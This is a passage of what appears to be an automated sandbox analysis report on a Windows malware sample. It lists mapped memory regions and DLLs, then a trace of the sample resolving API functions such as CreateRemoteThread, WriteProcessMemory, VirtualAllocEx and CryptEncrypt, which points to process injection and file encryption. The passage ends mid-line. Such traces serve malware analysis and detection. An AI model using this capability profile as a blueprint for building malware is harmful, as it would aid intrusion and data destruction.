"private_0x000000007efe0000" filename = "" Region: id = 2906 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2907 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2947 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 2948 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 2949 start_va = 0x170000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 2950 start_va = 0x743d0000 end_va = 0x743d7fff entry_point = 0x743d0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2951 start_va = 0x743e0000 end_va = 0x7443bfff entry_point = 0x743e0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2952 start_va = 0x74440000 end_va = 0x7447efff entry_point = 0x74440000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2953 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 2954 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2955 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 2956 start_va = 0x3c0000 end_va = 0x426fff entry_point = 0x3c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2957 start_va = 0x550000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 2958 start_va = 0x75800000 end_va = 0x7580bfff entry_point = 0x75800000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2959 start_va = 0x75810000 end_va = 0x7586ffff entry_point = 0x75810000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2960 start_va = 0x759c0000 end_va = 0x75acffff entry_point = 0x759c0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2961 start_va = 0x75e70000 end_va = 0x75f1bfff entry_point = 0x75e70000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2962 start_va = 0x76640000 end_va = 0x76685fff entry_point = 0x76640000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2963 start_va = 0x767d0000 end_va = 0x767e8fff entry_point = 0x767d0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2964 start_va = 0x76800000 end_va = 0x768effff entry_point = 0x76800000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2965 start_va = 0x778b0000 end_va = 0x779a9fff entry_point = 0x0 region_type = private name = "private_0x00000000778b0000" filename = "" Region: id = 2966 start_va = 0x779b0000 end_va = 0x77acefff entry_point = 0x0 region_type = private name = "private_0x00000000779b0000" filename = "" Region: id = 2967 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2968 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2969 start_va = 0x758c0000 end_va = 0x759bffff entry_point = 0x758c0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2970 start_va = 0x76950000 end_va = 0x769dffff entry_point = 0x76950000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2971 start_va = 0x768f0000 end_va = 0x768f9fff entry_point = 0x768f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2972 start_va = 0x76110000 end_va = 0x761acfff entry_point = 0x76110000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 2973 start_va = 0x77740000 end_va = 0x777dffff entry_point = 0x77740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2974 start_va = 0x20000 end_va = 0x3dfff entry_point = 0x20000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2975 start_va = 0x560000 end_va = 0x6e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 2976 start_va = 0x20000 end_va = 0x3dfff entry_point = 0x20000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2977 start_va = 0x760b0000 end_va = 0x7610ffff entry_point = 0x760b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2978 start_va = 0x76570000 end_va = 0x7663bfff entry_point = 0x76570000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2979 start_va = 0x6f0000 end_va = 0x870fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 2980 start_va = 0x970000 end_va = 0x1d6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 2984 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2985 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2986 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 2987 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2988 start_va = 0x1d70000 end_va = 0x2162fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d70000" filename = "" Region: id = 2989 start_va = 0x76240000 end_va = 0x7635cfff entry_point = 0x76240000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 2990 start_va = 0x76360000 end_va = 0x7636bfff entry_point = 0x76360000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 2991 start_va = 0x76a70000 end_va = 0x776b9fff entry_point = 0x76a70000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 2992 start_va = 0x76370000 end_va = 0x763c6fff entry_point = 0x76370000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2993 start_va = 0x75ad0000 end_va = 0x75ad4fff entry_point = 0x75ad0000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 2994 start_va = 0x75ae0000 end_va = 0x75c3bfff entry_point = 0x75ae0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2996 start_va = 0x75f20000 end_va = 0x76014fff entry_point = 0x75f20000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 2997 start_va = 0x76690000 end_va = 0x767c5fff entry_point = 0x76690000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 2998 start_va = 0x761b0000 end_va = 0x7623efff entry_point = 0x761b0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2999 start_va = 0x75c40000 end_va = 0x75e3afff entry_point = 0x75c40000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 3000 start_va = 0x75690000 end_va = 0x75697fff entry_point = 0x75690000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 3001 start_va = 0x430000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 3002 start_va = 0x75670000 end_va = 0x75685fff entry_point = 0x75670000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 3003 start_va = 0x4b0000 end_va = 0x4ebfff entry_point = 0x4b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3004 start_va = 0x4b0000 end_va = 0x4ebfff entry_point = 0x4b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3005 start_va = 0x4b0000 end_va = 0x4ebfff entry_point = 0x4b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3006 start_va = 0x4b0000 end_va = 0x4ebfff entry_point = 0x4b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3007 start_va = 0x4b0000 end_va = 0x4ebfff entry_point = 0x4b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3013 start_va = 0x75630000 end_va = 0x7566afff entry_point = 0x75630000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3014 start_va = 0x2170000 end_va = 0x243efff entry_point = 0x2170000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3015 start_va = 0x4f0000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3016 start_va = 0x910000 end_va = 0x94ffff entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 3017 start_va = 0x2450000 end_va = 0x248ffff entry_point = 0x0 region_type = private name = "private_0x0000000002450000" filename = "" Region: id = 3018 start_va = 0x24c0000 end_va = 0x24fffff entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 3019 start_va = 0x2510000 end_va = 0x254ffff entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 3020 start_va = 0x2550000 end_va = 0x258ffff entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 3021 start_va = 0x25d0000 end_va = 0x260ffff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 3022 start_va = 0x2650000 end_va = 0x268ffff entry_point = 0x0 region_type = private name = "private_0x0000000002650000" filename = "" Region: id = 3023 start_va = 0x26f0000 end_va = 0x272ffff entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 3024 start_va = 0x2770000 end_va = 0x27affff entry_point = 0x0 region_type = private name = "private_0x0000000002770000" filename = "" Region: id = 3025 start_va = 0x2810000 end_va = 0x284ffff entry_point = 0x0 region_type = private name = "private_0x0000000002810000" filename = "" Region: id = 3026 start_va = 0x2850000 end_va = 0x288ffff entry_point = 0x0 region_type = private name = "private_0x0000000002850000" filename = "" Region: id = 3027 start_va = 0x2890000 end_va = 0x28cffff entry_point = 0x0 region_type = private name = "private_0x0000000002890000" filename = "" Region: id = 3028 start_va = 0x2930000 end_va = 0x296ffff entry_point = 0x0 region_type = private name = "private_0x0000000002930000" filename = "" Region: id = 3029 start_va = 0x7ef9e000 end_va = 0x7efa0fff entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 3030 start_va = 0x7efa1000 end_va = 0x7efa3fff entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 3031 start_va = 0x7efa4000 end_va = 0x7efa6fff entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 3032 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 3033 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 3034 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 3035 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 3036 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 3549 start_va = 0x90000 end_va = 0x9bfff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 3558 start_va = 0x90000 end_va = 0x9bfff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 3637 start_va = 0x90000 end_va = 0x9bfff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 3640 start_va = 0x90000 end_va = 0x9bfff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 3722 start_va = 0x90000 end_va = 0x9bfff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 3724 start_va = 0x90000 end_va = 0x9bfff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 3726 start_va = 0x90000 end_va = 0x9bfff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 3832 start_va = 0x90000 end_va = 0xbffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Thread: id = 215 os_tid = 0x7e4 Thread: id = 216 os_tid = 0x350 [0313.051] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0313.051] GetProcAddress (hModule=0x759c0000, lpProcName="TerminateThread") returned 0x759d7a2f [0313.051] GetProcAddress (hModule=0x759c0000, lpProcName="LoadLibraryA") returned 0x759d49d7 [0313.051] GetProcAddress (hModule=0x759c0000, lpProcName="DeleteFileW") returned 0x759d89b3 [0313.051] GetProcAddress (hModule=0x759c0000, lpProcName="HeapReAlloc") returned 0x77cf1f6e [0313.051] GetProcAddress (hModule=0x759c0000, lpProcName="GetNativeSystemInfo") returned 0x759e10b5 [0313.051] GetProcAddress (hModule=0x759c0000, lpProcName="CreateThread") returned 0x759d34d5 [0313.051] GetProcAddress (hModule=0x759c0000, lpProcName="HeapAlloc") returned 0x77cde026 [0313.051] GetProcAddress (hModule=0x759c0000, lpProcName="HeapDestroy") returned 0x759d35b7 [0313.051] GetProcAddress (hModule=0x759c0000, lpProcName="VirtualAllocEx") returned 0x759ed9b0 [0313.051] GetProcAddress (hModule=0x759c0000, lpProcName="LocalFree") returned 0x759d2d3c [0313.051] GetProcAddress (hModule=0x759c0000, lpProcName="DeleteCriticalSection") returned 0x77ce45f5 [0313.051] GetProcAddress (hModule=0x759c0000, lpProcName="GetComputerNameW") returned 0x759ddd0e [0313.051] GetProcAddress (hModule=0x759c0000, lpProcName="GetProcessHeap") returned 0x759d14e9 [0313.051] GetProcAddress (hModule=0x759c0000, lpProcName="SystemTimeToFileTime") returned 0x759d5a7e [0313.052] GetProcAddress (hModule=0x759c0000, lpProcName="GlobalMemoryStatusEx") returned 0x759fd4c4 [0313.052] GetProcAddress (hModule=0x759c0000, lpProcName="CreateProcessW") returned 0x759d103d [0313.052] GetProcAddress (hModule=0x759c0000, lpProcName="WideCharToMultiByte") returned 0x759d170d [0313.052] GetProcAddress (hModule=0x759c0000, lpProcName="InterlockedIncrement") returned 0x759d1400 [0313.052] GetProcAddress (hModule=0x759c0000, lpProcName="GetSystemTime") returned 0x759d5a96 [0313.052] GetProcAddress (hModule=0x759c0000, lpProcName="VirtualFreeEx") returned 0x759ed9c8 [0313.052] GetProcAddress (hModule=0x759c0000, lpProcName="IsBadReadPtr") returned 0x759fd075 [0313.052] GetProcAddress (hModule=0x759c0000, lpProcName="lstrcmpiW") returned 0x759ed5cd [0313.052] GetProcAddress (hModule=0x759c0000, lpProcName="OpenMutexW") returned 0x759d5151 [0313.052] GetProcAddress (hModule=0x759c0000, lpProcName="SetEndOfFile") returned 0x759ece2e [0313.052] GetProcAddress (hModule=0x759c0000, lpProcName="GetCurrentThread") returned 0x759d17ec [0313.052] GetProcAddress (hModule=0x759c0000, lpProcName="FlushFileBuffers") returned 0x759d469b [0313.052] GetProcAddress (hModule=0x759c0000, lpProcName="RemoveVectoredExceptionHandler") returned 0x77d25f41 [0313.052] GetProcAddress (hModule=0x759c0000, lpProcName="GetCurrentProcess") returned 0x759d1809 [0313.052] GetProcAddress (hModule=0x759c0000, lpProcName="SetErrorMode") returned 0x759d1b00 [0313.052] GetProcAddress (hModule=0x759c0000, lpProcName="GetVersionExW") returned 0x759d1ae5 [0313.052] GetProcAddress (hModule=0x759c0000, lpProcName="DuplicateHandle") returned 0x759d1886 [0313.052] GetProcAddress (hModule=0x759c0000, lpProcName="GetModuleHandleA") returned 0x759d1245 [0313.052] GetProcAddress (hModule=0x759c0000, lpProcName="AddVectoredExceptionHandler") returned 0x77d2742b [0313.052] GetProcAddress (hModule=0x759c0000, lpProcName="ExitProcess") returned 0x759d7a10 [0313.053] GetProcAddress (hModule=0x759c0000, lpProcName="GetCurrentProcessId") returned 0x759d11f8 [0313.053] GetProcAddress (hModule=0x759c0000, lpProcName="CopyFileW") returned 0x759f830d [0313.053] GetProcAddress (hModule=0x759c0000, lpProcName="lstrcmpiA") returned 0x759d3e8e [0313.053] GetProcAddress (hModule=0x759c0000, lpProcName="IsWow64Process") returned 0x759d195e [0313.053] GetProcAddress (hModule=0x759c0000, lpProcName="FindFirstChangeNotificationW") returned 0x759ed851 [0313.053] GetProcAddress (hModule=0x759c0000, lpProcName="FindNextChangeNotification") returned 0x759f5c1e [0313.053] GetProcAddress (hModule=0x759c0000, lpProcName="IsProcessInJob") returned 0x759fc7ea [0313.053] GetProcAddress (hModule=0x759c0000, lpProcName="CreateRemoteThread") returned 0x75a5416b [0313.053] GetProcAddress (hModule=0x759c0000, lpProcName="CreateNamedPipeW") returned 0x75a5414b [0313.053] GetProcAddress (hModule=0x759c0000, lpProcName="DisconnectNamedPipe") returned 0x75a541df [0313.053] GetProcAddress (hModule=0x759c0000, lpProcName="ConnectNamedPipe") returned 0x75a540fb [0313.053] GetProcAddress (hModule=0x759c0000, lpProcName="GetLogicalDrives") returned 0x759d5371 [0313.053] GetProcAddress (hModule=0x759c0000, lpProcName="GetDriveTypeW") returned 0x759d418b [0313.053] GetProcAddress (hModule=0x759c0000, lpProcName="GetUserDefaultUILanguage") returned 0x759d44ab [0313.053] GetProcAddress (hModule=0x759c0000, lpProcName="CopyFileExW") returned 0x759f3b92 [0313.053] GetProcAddress (hModule=0x759c0000, lpProcName="GetEnvironmentVariableW") returned 0x759d1b48 [0313.053] GetProcAddress (hModule=0x759c0000, lpProcName="SetFilePointer") returned 0x759d17d1 [0313.053] GetProcAddress (hModule=0x759c0000, lpProcName="InitializeCriticalSection") returned 0x77ce2c42 [0313.053] GetProcAddress (hModule=0x759c0000, lpProcName="GetTimeZoneInformation") returned 0x759d465a [0313.053] GetProcAddress (hModule=0x759c0000, lpProcName="MultiByteToWideChar") returned 0x759d192e [0313.053] GetProcAddress (hModule=0x759c0000, lpProcName="SetFileAttributesW") returned 0x759ed4f7 [0313.053] GetProcAddress (hModule=0x759c0000, lpProcName="GetVolumeNameForVolumeMountPointW") returned 0x759e052f [0313.053] GetProcAddress (hModule=0x759c0000, lpProcName="OpenProcess") returned 0x759d1986 [0313.053] GetProcAddress (hModule=0x759c0000, lpProcName="GetFileTime") returned 0x759d4407 [0313.054] GetProcAddress (hModule=0x759c0000, lpProcName="ReleaseMutex") returned 0x759d111e [0313.054] GetProcAddress (hModule=0x759c0000, lpProcName="LeaveCriticalSection") returned 0x77cd2270 [0313.054] GetProcAddress (hModule=0x759c0000, lpProcName="GetModuleFileNameW") returned 0x759d4950 [0313.054] GetProcAddress (hModule=0x759c0000, lpProcName="SetFileTime") returned 0x759eecbb [0313.054] GetProcAddress (hModule=0x759c0000, lpProcName="RemoveDirectoryW") returned 0x75a544cf [0313.054] GetProcAddress (hModule=0x759c0000, lpProcName="VirtualAlloc") returned 0x759d1856 [0313.054] GetProcAddress (hModule=0x759c0000, lpProcName="ExpandEnvironmentStringsW") returned 0x759d4173 [0313.054] GetProcAddress (hModule=0x759c0000, lpProcName="WriteFile") returned 0x759d1282 [0313.054] GetProcAddress (hModule=0x759c0000, lpProcName="FindNextFileW") returned 0x759d54ee [0313.054] GetProcAddress (hModule=0x759c0000, lpProcName="EnterCriticalSection") returned 0x77cd22b0 [0313.054] GetProcAddress (hModule=0x759c0000, lpProcName="GetFileAttributesW") returned 0x759d1b18 [0313.054] GetProcAddress (hModule=0x759c0000, lpProcName="FindClose") returned 0x759d4442 [0313.054] GetProcAddress (hModule=0x759c0000, lpProcName="OpenEventW") returned 0x759d15d6 [0313.054] GetProcAddress (hModule=0x759c0000, lpProcName="GetTempPathW") returned 0x759ed4dc [0313.054] GetProcAddress (hModule=0x759c0000, lpProcName="SetLastError") returned 0x759d11a9 [0313.054] GetProcAddress (hModule=0x759c0000, lpProcName="HeapFree") returned 0x759d14c9 [0313.054] GetProcAddress (hModule=0x759c0000, lpProcName="HeapCreate") returned 0x759d4a2d [0313.054] GetProcAddress (hModule=0x759c0000, lpProcName="WriteProcessMemory") returned 0x759ed9e0 [0313.054] GetProcAddress (hModule=0x759c0000, lpProcName="GetFileSizeEx") returned 0x759d59e2 [0313.054] GetProcAddress (hModule=0x759c0000, lpProcName="FindFirstFileW") returned 0x759d4435 [0313.054] GetProcAddress (hModule=0x759c0000, lpProcName="InterlockedExchange") returned 0x759d1462 [0313.054] GetProcAddress (hModule=0x759c0000, lpProcName="GetVolumeInformationW") returned 0x759ec860 [0313.054] GetProcAddress (hModule=0x759c0000, lpProcName="ReadFile") returned 0x759d3ed3 [0313.054] GetProcAddress (hModule=0x759c0000, lpProcName="CreateDirectoryW") returned 0x759d4259 [0313.055] GetProcAddress (hModule=0x759c0000, lpProcName="FreeLibrary") returned 0x759d34c8 [0313.055] GetProcAddress (hModule=0x759c0000, lpProcName="GetModuleHandleW") returned 0x759d34b0 [0313.055] GetProcAddress (hModule=0x759c0000, lpProcName="GetProcAddress") returned 0x759d1222 [0313.055] GetProcAddress (hModule=0x759c0000, lpProcName="LoadLibraryW") returned 0x759d492b [0313.055] GetProcAddress (hModule=0x759c0000, lpProcName="Process32FirstW") returned 0x759f8baf [0313.055] GetProcAddress (hModule=0x759c0000, lpProcName="Process32NextW") returned 0x759f896c [0313.055] GetProcAddress (hModule=0x759c0000, lpProcName="GetLastError") returned 0x759d11c0 [0313.055] GetProcAddress (hModule=0x759c0000, lpProcName="CreateToolhelp32Snapshot") returned 0x759f735f [0313.055] GetProcAddress (hModule=0x759c0000, lpProcName="CreateFileW") returned 0x759d3f5c [0313.055] GetProcAddress (hModule=0x759c0000, lpProcName="CreateMutexW") returned 0x759d424c [0313.055] GetProcAddress (hModule=0x759c0000, lpProcName="ResetEvent") returned 0x759d16dd [0313.055] GetProcAddress (hModule=0x759c0000, lpProcName="CloseHandle") returned 0x759d1410 [0313.055] GetProcAddress (hModule=0x759c0000, lpProcName="SetEvent") returned 0x759d16c5 [0313.055] GetProcAddress (hModule=0x759c0000, lpProcName="Sleep") returned 0x759d10ff [0313.055] GetProcAddress (hModule=0x759c0000, lpProcName="CreateEventW") returned 0x759d183e [0313.055] GetProcAddress (hModule=0x759c0000, lpProcName="WaitForSingleObject") returned 0x759d1136 [0313.055] GetProcAddress (hModule=0x759c0000, lpProcName="WaitForMultipleObjects") returned 0x759d4220 [0313.055] GetProcAddress (hModule=0x759c0000, lpProcName="GetTickCount") returned 0x759d110c [0313.055] GetProcAddress (hModule=0x759c0000, lpProcName="VirtualFree") returned 0x759d186e [0313.055] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0313.073] GetProcAddress (hModule=0x758c0000, lpProcName="GetIconInfo") returned 0x758e49ea [0313.073] GetProcAddress (hModule=0x758c0000, lpProcName="DrawIcon") returned 0x758e8deb [0313.073] GetProcAddress (hModule=0x758c0000, lpProcName="LoadImageW") returned 0x758dfbd1 [0313.073] GetProcAddress (hModule=0x758c0000, lpProcName="GetCursorPos") returned 0x758e1218 [0313.073] GetProcAddress (hModule=0x758c0000, lpProcName="DefWindowProcW") returned 0x77ce25dd [0313.074] GetProcAddress (hModule=0x758c0000, lpProcName="CreateWindowExW") returned 0x758d8a29 [0313.074] GetProcAddress (hModule=0x758c0000, lpProcName="UnregisterClassW") returned 0x758d9f84 [0313.074] GetProcAddress (hModule=0x758c0000, lpProcName="GetKeyboardLayoutList") returned 0x758e2e69 [0313.074] GetProcAddress (hModule=0x758c0000, lpProcName="CharLowerA") returned 0x758e3e75 [0313.074] GetProcAddress (hModule=0x758c0000, lpProcName="CharToOemW") returned 0x75931a26 [0313.074] GetProcAddress (hModule=0x758c0000, lpProcName="TranslateMessage") returned 0x758d7809 [0313.074] GetProcAddress (hModule=0x758c0000, lpProcName="PeekMessageW") returned 0x758e05ba [0313.074] GetProcAddress (hModule=0x758c0000, lpProcName="DispatchMessageW") returned 0x758d787b [0313.074] GetProcAddress (hModule=0x758c0000, lpProcName="MsgWaitForMultipleObjects") returned 0x758e0b4a [0313.074] GetProcAddress (hModule=0x758c0000, lpProcName="RegisterClassExW") returned 0x758db17d [0313.074] GetProcAddress (hModule=0x758c0000, lpProcName="SetWindowLongA") returned 0x758e6110 [0313.074] GetProcAddress (hModule=0x758c0000, lpProcName="GetWindowLongA") returned 0x758dd156 [0313.074] GetProcAddress (hModule=0x758c0000, lpProcName="CharUpperW") returned 0x758df350 [0313.074] GetProcAddress (hModule=0x758c0000, lpProcName="DestroyWindow") returned 0x758d9a55 [0313.074] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x76240000 [0313.076] GetProcAddress (hModule=0x76240000, lpProcName="CryptImportPublicKeyInfo") returned 0x76256c0e [0313.076] GetProcAddress (hModule=0x76240000, lpProcName="CryptDecodeObjectEx") returned 0x7624d718 [0313.076] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0313.076] GetProcAddress (hModule=0x77740000, lpProcName="RegCloseKey") returned 0x7775469d [0313.076] GetProcAddress (hModule=0x77740000, lpProcName="GetAce") returned 0x777545f0 [0313.077] GetProcAddress (hModule=0x77740000, lpProcName="CryptEncrypt") returned 0x7776779b [0313.077] GetProcAddress (hModule=0x77740000, lpProcName="GetSidSubAuthorityCount") returned 0x77750e0c [0313.077] GetProcAddress (hModule=0x77740000, lpProcName="AllocateAndInitializeSid") returned 0x777540e6 [0313.077] GetProcAddress (hModule=0x77740000, lpProcName="GetSidSubAuthority") returned 0x77750e24 [0313.077] GetProcAddress (hModule=0x77740000, lpProcName="SetEntriesInAclW") returned 0x77752a66 [0313.077] GetProcAddress (hModule=0x77740000, lpProcName="RegCreateKeyExW") returned 0x777540fe [0313.077] GetProcAddress (hModule=0x77740000, 